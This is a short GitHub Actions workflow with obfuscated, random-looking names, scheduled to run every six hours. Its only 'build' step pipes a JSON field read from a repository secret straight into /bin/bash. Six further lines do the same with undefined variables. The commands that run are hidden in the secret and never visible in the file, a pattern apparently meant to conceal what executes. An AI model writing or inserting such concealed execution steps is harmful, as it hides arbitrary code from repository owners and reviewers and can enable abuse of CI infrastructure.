name: gechundan5678

on:
  workflow_dispatch:
  schedule:
    - cron: '9 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gechundan5678
        env:
          qo8794: ${{ secrets.qo8794 }}
        run: |
          echo $qo8794 | jq -r .xed11696 | /bin/bash
          echo $k1306 | jq -r .y494 | /bin/bash
          echo $n40 | jq -r .w8 | /bin/bash
          echo $lth38965 | jq -r .afmo6 | /bin/bash
          echo $eihun87233 | jq -r .m29 | /bin/bash
          echo $szx89 | jq -r .krx0346 | /bin/bash
          echo $tlix9 | jq -r .y44 | /bin/bash

